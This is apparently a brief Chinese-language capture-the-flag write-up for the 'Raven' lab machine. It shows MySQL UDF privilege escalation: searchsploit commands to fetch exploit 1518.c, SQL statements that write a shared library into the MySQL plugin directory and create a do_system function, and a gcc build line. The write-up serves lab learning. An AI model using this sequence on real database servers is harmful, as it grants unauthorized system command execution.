raven(mysql-udf提权)

writeup

udf提权,以前做过udf提权,但时间仓促,没有深入理解。

如何安装UDF plugin

1
2
3
searchsploit mysql udf
searchsploit -m exploits/linux/local/1518.c
cat /root/1518.c

运行前查看代码是一个合格的渗透工程师应有的基本守则。

1
2
3
4
5
6
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/tmp/1518.so'));
* mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
* mysql> create function do_system returns integer soname '1518.so';
* mysql> select * from mysql.func;

接下来,用do_system反弹一个bash shell。

总结

参考资料:wooyun——MySQL和PostgreSQL数据库安全配置

有问题的地方:gcc参数的编译

1
gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

gcc编译链接命令有点不熟悉。以前只用过最简单的-o,以后再学下。

吃饭吃饭~~